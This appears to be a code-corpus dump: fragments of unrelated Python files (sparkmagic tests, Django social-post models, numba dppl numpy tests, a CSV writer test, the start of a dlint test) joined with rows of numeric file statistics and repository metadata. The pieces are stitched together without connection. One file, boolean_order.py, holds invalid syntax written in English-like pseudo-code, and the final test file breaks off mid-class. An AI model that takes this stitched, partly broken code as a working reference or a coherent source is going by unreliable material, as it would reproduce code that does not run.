    magic.spark_controller.run_command.side_effect = [(True,'out',MIMETYPE_TEXT_PLAIN), df]
    magic.execute_spark("", output_var, None, None, None, session, True)
    magic.ipython_display.write.assert_called_once_with('out')
    magic._spark_store_command.assert_called_once_with(output_var, None, None, None, True)
    assert shell.user_ns[output_var] == df
    magic.spark_controller.run_command.side_effect = None
    magic.spark_controller.run_command.return_value = (False,'out',MIMETYPE_TEXT_PLAIN)
    assert_raises(SparkStatementException, magic.execute_spark,"", output_var, None, None, None, session, True)


@with_setup(_setup, _teardown)
def test_spark_exception_with_output_var():
    # If fetching the stored result raises, the exception propagates and
    # nothing is bound into the user namespace.
    mockSparkCommand = MagicMock()
    magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
    exception = BadUserDataException("Ka-boom!")
    output_var = "var_name"
    df = 'df'
    magic.spark_controller.run_command.side_effect = [(True,'out',MIMETYPE_TEXT_PLAIN), exception]
    assert_raises(BadUserDataException, magic.execute_spark,"", output_var, None, None, None, session, True)
    magic.ipython_display.write.assert_called_once_with('out')
    magic._spark_store_command.assert_called_once_with(output_var, None, None, None, True)
    assert shell.user_ns == {}


@with_setup(_setup, _teardown)
def test_spark_statement_exception():
    # By default, a statement error does NOT tear down the Livy session.
    mockSparkCommand = MagicMock()
    magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
    exception = BadUserDataException("Ka-boom!")
    magic.spark_controller.run_command.side_effect = [(False, 'out', "text/plain"), exception]
    assert_raises(SparkStatementException, magic.execute_spark,"", None, None, None, None, session, True)
    magic.spark_controller.cleanup.assert_not_called()


@with_setup(_setup, _teardown)
def test_spark_statement_exception_shutdowns_livy_session():
    # With the config flag set, a statement error deletes the Livy session.
    conf.override_all({
        "shutdown_session_on_spark_statement_errors": True
    })
    mockSparkCommand = MagicMock()
    magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
    exception = BadUserDataException("Ka-boom!")
    magic.spark_controller.run_command.side_effect = [(False, 'out', "text/plain"), exception]
    assert_raises(SparkStatementException, magic.execute_spark,"", None, None, None, None, session, True)
    magic.spark_controller.delete_session_by_name.assert_called_once()
| 39.755932
| 150
| 0.766456
| 1,583
| 11,728
| 5.263424
| 0.108023
| 0.044407
| 0.074412
| 0.06073
| 0.800048
| 0.777724
| 0.772324
| 0.760442
| 0.723236
| 0.674748
| 0
| 0.005002
| 0.130713
| 11,728
| 294
| 151
| 39.891156
| 0.812261
| 0.001791
| 0
| 0.635965
| 0
| 0.008772
| 0.057839
| 0.019564
| 0
| 0
| 0
| 0
| 0.188596
| 1
| 0.096491
| false
| 0.013158
| 0.039474
| 0
| 0.135965
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8337e550b8851ff06b69198bafd1bfc864e8e2fa
| 20
|
py
|
Python
|
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
def rand():
    """Placeholder stub used by the completion test fixture; returns None."""
| 10
| 11
| 0.55
| 3
| 20
| 3.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 20
| 2
| 12
| 10
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
833d77edc98bef37fa7c066507a694abf77e93e8
| 106
|
py
|
Python
|
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | 1
|
2019-04-28T15:47:39.000Z
|
2019-04-28T15:47:39.000Z
|
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | null | null | null |
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | null | null | null |
# app/file helper.py
from __init__ import application
def foo_method():
    """Emit an info-level greeting through the shared Flask app logger."""
    log = application.logger
    log.info("hi")
| 21.2
| 33
| 0.754717
| 15
| 106
| 5
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132075
| 106
| 5
| 33
| 21.2
| 0.815217
| 0.169811
| 0
| 0
| 0
| 0
| 0.022989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
55cf5567b2be2c7d88ba2285cb2478aef72426b2
| 1,861
|
py
|
Python
|
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
from enum import auto
# from posts.serializers import Shareserializer
from django.db import models
from django.contrib.auth.models import User
from django.db.models.deletion import CASCADE
# Create your models here.
class Post(models.Model):
    """A text post authored by a user."""
    text = models.TextField()
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    created_on = models.DateTimeField(auto_now_add=True)

    def get_num_like(self):
        """Return how many Like rows reference this post."""
        return Like.objects.filter(post=self).count()

    def get_num_share(self):
        """Return how many Share rows reference this post."""
        return Share.objects.filter(post=self).count()

    def get_num_comment(self):
        """Return how many Comment rows reference this post."""
        return Comment.objects.filter(post=self).count()
class Like(models.Model):
    """One user's like on one post."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    created_on = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Ensure each (user, post) pair can only exist once, so a user
        # cannot like the same post twice.
        unique_together = ("user", "post")
class Share(models.Model):
    """One user's share of one post."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    created_on = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Ensure each (user, post) pair can only exist once, so a user
        # cannot share the same post twice.
        unique_together = ("user", "post",)
class Comment(models.Model):
    """One user's text comment on one post."""
    text = models.TextField()
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    created_on = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Ensure each (user, post) pair can only exist once.
        # NOTE(review): this allows at most one comment per user per post —
        # confirm that restriction is intended.
        unique_together = ("user", "post")
| 33.836364
| 80
| 0.713057
| 262
| 1,861
| 4.958015
| 0.244275
| 0.08622
| 0.075443
| 0.113164
| 0.78445
| 0.764434
| 0.764434
| 0.764434
| 0.710547
| 0.710547
| 0
| 0.003974
| 0.188608
| 1,861
| 54
| 81
| 34.462963
| 0.856291
| 0.211177
| 0
| 0.545455
| 0
| 0
| 0.016472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.121212
| 0.090909
| 0.909091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
55ef313614d1d2f6150c3d00d17154bf04d71f22
| 179
|
py
|
Python
|
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
name = "John"
age = 17
print(name == "John" or not age > 17)
print(name == "John" or not age > 17)
print("name" is "Ellis" or not ("name" equal "John" and he is 17 years old))
| 19.888889
| 76
| 0.614525
| 33
| 179
| 3.333333
| 0.424242
| 0.218182
| 0.272727
| 0.381818
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0
| 0.057143
| 0.217877
| 179
| 8
| 77
| 22.375
| 0.728571
| 0
| 0
| 0.4
| 0
| 0
| 0.162011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.6
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
36c06066f62a9854abced621cba3e972966da5b3
| 118
|
py
|
Python
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 1
|
2021-09-15T04:47:25.000Z
|
2021-09-15T04:47:25.000Z
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 39
|
2021-06-21T05:52:43.000Z
|
2022-03-29T18:39:06.000Z
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 1
|
2021-12-23T15:36:54.000Z
|
2021-12-23T15:36:54.000Z
|
def test_can_import_project_package():
    """Smoke test: the project package must be importable at all."""
    import dags  # noqa pylint: disable=import-outside-toplevel, unused-import
| 39.333333
| 78
| 0.79661
| 16
| 118
| 5.625
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 118
| 2
| 79
| 59
| 0.865385
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7fcb26a504a14b4f04d51f7a27dfcab3111cfc7b
| 32
|
py
|
Python
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 166
|
2020-04-20T09:30:54.000Z
|
2021-05-16T07:42:15.000Z
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 15
|
2020-05-12T23:58:01.000Z
|
2021-05-05T12:03:51.000Z
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 35
|
2020-04-27T13:11:42.000Z
|
2021-05-16T07:45:02.000Z
|
from .stereonet import StereoNet
| 32
| 32
| 0.875
| 4
| 32
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 32
| 1
| 32
| 32
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d0992e8439e1ebf6191751042a2abae13c64eda
| 121
|
py
|
Python
|
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
import frappe
import unittest
class TestPromoSettings(unittest.TestCase):
    """Empty test case scaffold for the Promo Settings doctype."""
| 17.285714
| 43
| 0.859504
| 14
| 121
| 7.071429
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107438
| 121
| 7
| 44
| 17.285714
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
182891ac804e67d1d8c69e24b4e7997b70fdb382
| 74
|
py
|
Python
|
src/tentaclio/databases/__init__.py
|
datavaluepeople/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 12
|
2019-04-30T16:07:42.000Z
|
2021-12-08T08:02:09.000Z
|
src/tentaclio/databases/__init__.py
|
octoenergy/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 74
|
2019-04-25T11:18:22.000Z
|
2022-01-18T11:31:14.000Z
|
src/tentaclio/databases/__init__.py
|
datavaluepeople/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 4
|
2019-05-05T13:13:21.000Z
|
2022-01-14T00:33:07.000Z
|
"""Tentaclio's db registry and api."""
from .db_registry import * # noqa
| 24.666667
| 38
| 0.689189
| 11
| 74
| 4.545455
| 0.818182
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 2
| 39
| 37
| 0.806452
| 0.513514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
185d99ca8292d04352dd1580a9c79a6b7bbea7f8
| 4,610
|
py
|
Python
|
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
#! /usr/bin/env python
from __future__ import print_function
from timeit import default_timer as time
import sys
import numpy as np
from numba import dppl, njit
from numba.dppl.testing import unittest
from numba.dppl.testing import DPPLTestCase
import dppl.ocldrv as ocldrv
class TestNumpy_comparison_functions(DPPLTestCase):
    """Check that numpy comparison/logical/extrema functions give the same
    results inside an ``@njit(parallel={'offload':True})`` region as the
    plain numpy call.

    Every test follows one pattern: compile a tiny wrapper with njit, run
    it on sample arrays, call the same numpy function directly, and assert
    the two results are element-wise equal.
    """
    # Shared integer operands for the comparison tests below.
    a = np.array([4,5,6])
    b = np.array([2,6,6])
    def test_greater(self):
        """np.greater under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.greater(a, b)
            return c
        c = f(self.a, self.b)
        d = np.greater(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_greater_equal(self):
        """np.greater_equal under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.greater_equal(a, b)
            return c
        c = f(self.a, self.b)
        d = np.greater_equal(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_less(self):
        """np.less under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.less(a, b)
            return c
        c = f(self.a, self.b)
        d = np.less(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_less_equal(self):
        """np.less_equal under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.less_equal(a, b)
            return c
        c = f(self.a, self.b)
        d = np.less_equal(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_not_equal(self):
        """np.not_equal under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.not_equal(a, b)
            return c
        c = f(self.a, self.b)
        d = np.not_equal(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_equal(self):
        """np.equal under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.equal(a, b)
            return c
        c = f(self.a, self.b)
        d = np.equal(self.a, self.b)
        self.assertTrue(np.all(c == d))
    def test_logical_and(self):
        """np.logical_and on boolean arrays under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.logical_and(a, b)
            return c
        a = np.array([True, True, False])
        b = np.array([True, False, False])
        c = f(a, b)
        d = np.logical_and(a, b)
        self.assertTrue(np.all(c == d))
    def test_logical_or(self):
        """np.logical_or on boolean arrays under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.logical_or(a, b)
            return c
        a = np.array([True, True, False])
        b = np.array([True, False, False])
        c = f(a, b)
        d = np.logical_or(a, b)
        self.assertTrue(np.all(c == d))
    def test_logical_xor(self):
        """np.logical_xor on boolean arrays under njit matches plain numpy."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.logical_xor(a, b)
            return c
        a = np.array([True, True, False])
        b = np.array([True, False, False])
        c = f(a, b)
        d = np.logical_xor(a, b)
        self.assertTrue(np.all(c == d))
    def test_logical_not(self):
        """np.logical_not (unary) on a boolean array under njit matches numpy."""
        @njit(parallel={'offload':True})
        def f(a):
            c = np.logical_not(a)
            return c
        a = np.array([True, True, False])
        c = f(a)
        d = np.logical_not(a)
        self.assertTrue(np.all(c == d))
    # The extrema tests below include a NaN element so the comparison (via
    # np.testing.assert_equal, which treats NaNs as equal) also covers
    # NaN-handling agreement between the njit and plain-numpy paths.
    def test_maximum(self):
        """np.maximum under njit matches plain numpy, including NaN input."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.maximum(a, b)
            return c
        a = np.array([5,6,7,np.nan], dtype=np.float32)
        b = np.array([5,7,6,100], dtype=np.float32)
        c = f(a, b)
        d = np.maximum(a, b)
        np.testing.assert_equal(c, d)
    def test_minimum(self):
        """np.minimum under njit matches plain numpy, including NaN input."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.minimum(a, b)
            return c
        a = np.array([5,6,7,np.nan], dtype=np.float32)
        b = np.array([5,7,6,100], dtype=np.float32)
        c = f(a, b)
        d = np.minimum(a, b)
        np.testing.assert_equal(c, d)
    def test_fmax(self):
        """np.fmax under njit matches plain numpy, including NaN input."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.fmax(a, b)
            return c
        a = np.array([5,6,7,np.nan], dtype=np.float32)
        b = np.array([5,7,6,100], dtype=np.float32)
        c = f(a, b)
        d = np.fmax(a, b)
        np.testing.assert_equal(c, d)
    def test_fmin(self):
        """np.fmin under njit matches plain numpy, including NaN input."""
        @njit(parallel={'offload':True})
        def f(a, b):
            c = np.fmin(a, b)
            return c
        a = np.array([5,6,7,np.nan], dtype=np.float32)
        b = np.array([5,7,6,100], dtype=np.float32)
        c = f(a, b)
        d = np.fmin(a, b)
        np.testing.assert_equal(c, d)
# Allow running this test module directly, not only via a test runner.
if __name__ == '__main__':
    unittest.main()
| 23.641026
| 54
| 0.500868
| 709
| 4,610
| 3.179126
| 0.09732
| 0.035492
| 0.026619
| 0.142857
| 0.824312
| 0.794144
| 0.794144
| 0.794144
| 0.744454
| 0.744454
| 0
| 0.01906
| 0.339913
| 4,610
| 194
| 55
| 23.762887
| 0.721656
| 0.004555
| 0
| 0.592857
| 0
| 0
| 0.023104
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.2
| false
| 0
| 0.057143
| 0
| 0.378571
| 0.007143
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a109c9c1554a48fc9b5f44f6d0e8aebeff6c301b
| 43
|
py
|
Python
|
agents/__init__.py
|
seungjaeryanlee/osim-rl-helper
|
5a4340321e765089afd3062093c797c04bfdbeec
|
[
"MIT"
] | 41
|
2018-06-27T15:42:26.000Z
|
2020-03-20T21:50:05.000Z
|
agents/__init__.py
|
BenjaminBush/skeletor
|
9e7d139948aaeae6e688d17016b63fb9ea895734
|
[
"MIT"
] | 5
|
2018-08-23T08:07:23.000Z
|
2022-01-02T10:44:52.000Z
|
agents/__init__.py
|
seungjaeryanlee/osim-rl-helper
|
5a4340321e765089afd3062093c797c04bfdbeec
|
[
"MIT"
] | 8
|
2018-07-29T03:18:02.000Z
|
2018-11-06T16:54:20.000Z
|
from .DoNothingAgent import DoNothingAgent
| 21.5
| 42
| 0.883721
| 4
| 43
| 9.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.974359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a1627a40af07553dd06cfa948539d911c166c30f
| 2,119
|
py
|
Python
|
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | null | null | null |
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | null | null | null |
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | 1
|
2020-03-09T14:04:28.000Z
|
2020-03-09T14:04:28.000Z
|
import unittest
from morphling.output import Writer
class TestWriter(unittest.TestCase):
    """Behavioral tests for morphling.output.Writer."""

    def test_be_able_to_write_file(self):
        """write() replaces file content: two writes leave one payload."""
        content = 'test data'
        destination = 'test/output_file/basic_write'
        writer = Writer()
        writer.write(content, destination)
        writer.write(content, destination)
        with open(destination, 'r') as handle:
            stored = handle.read()
        self.assertEqual(content, stored)

    def test_be_able_to_append_data_into_existing_file(self):
        """append() adds to existing content rather than replacing it."""
        content = 'test data'
        destination = 'test/output_file/basic_write'
        writer = Writer()
        writer.write(content, destination)
        writer.append(content, destination)
        with open(destination, 'r') as handle:
            stored = handle.read()
        self.assertEqual(content + content, stored)

    def test_be_able_to_write_csv_file(self):
        """to_csv() serializes rows as comma-separated lines."""
        rows = [['name', 'age', 'color'], ['John hopskin', 15, 'Blue sky']]
        destination = 'test/output_file/test_write_csv.csv'
        writer = Writer()
        writer.to_csv(rows, destination)
        with open(destination, 'r') as handle:
            stored = handle.read()
        self.assertEqual('name,age,color\nJohn hopskin,15,Blue sky\n', stored)

    def test_be_able_to_write_csv_when_there_is_new_line_beween_data(self):
        """Fields containing a newline come out quoted in the CSV output."""
        rows = [['name', 'age', 'color'], ['John\nhopskin', 15, 'Blue sky']]
        destination = 'test/output_file/test_write_csv_new_line.csv'
        writer = Writer()
        writer.to_csv(rows, destination)
        with open(destination, 'r') as handle:
            stored = handle.read()
        self.assertEqual('name,age,color\n"John\nhopskin",15,Blue sky\n', stored)

    def test_be_able_to_write_csv_when_there_is_comma_between_data(self):
        """Fields containing a comma come out quoted in the CSV output."""
        rows = [['name', 'age', 'color'], ['John, hopskin', 15, 'Blue, sky']]
        destination = 'test/output_file/test_write_csv_comma.csv'
        writer = Writer()
        writer.to_csv(rows, destination)
        with open(destination, 'r') as handle:
            stored = handle.read()
        self.assertEqual('name,age,color\n"John, hopskin",15,"Blue, sky"\n', stored)
| 39.981132
| 84
| 0.637093
| 290
| 2,119
| 4.386207
| 0.182759
| 0.133648
| 0.056604
| 0.051101
| 0.882075
| 0.865566
| 0.826258
| 0.779874
| 0.757075
| 0.757075
| 0
| 0.007407
| 0.235488
| 2,119
| 52
| 85
| 40.75
| 0.777778
| 0
| 0
| 0.555556
| 0
| 0
| 0.204342
| 0.111845
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.111111
| false
| 0
| 0.044444
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a17d9f3e9208c27cd8e0ba8dc6085b7795001e84
| 16,353
|
py
|
Python
|
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
def get_bad_module_attribute_use_implementation(illegal_module_attributes):
    """Build a throwaway linter instance that flags the given module attributes.

    The returned object subclasses BadModuleAttributeUseLinter with a dummy
    code/message and exposes *illegal_module_attributes* via the property the
    base class consults.
    """
    class Implementation(dlint.linters.helpers.bad_module_attribute_use.BadModuleAttributeUseLinter):
        _code = 'DUOXXX'
        _error_tmpl = 'DUOXXX error message'

        @property
        def illegal_module_attributes(self):
            return illegal_module_attributes

    return Implementation()
class TestBadModuleAttributeUse(dlint.test.base.BaseTest):
    """Tests for BadModuleAttributeUseLinter through a parameterized subclass.

    The original file repeated the parse/lint/compare boilerplate in all 21
    tests; it is factored into ``_assert_lint_results`` so each test states
    only its input snippet, the illegal-attribute map, and the expected flag
    positions. Lint-input strings are preserved byte-for-byte.
    """

    def _assert_lint_results(self, python_string, illegal_module_attributes, expected_positions):
        """Lint *python_string* and assert the reported (lineno, col_offset)
        pairs match *expected_positions* exactly (order included)."""
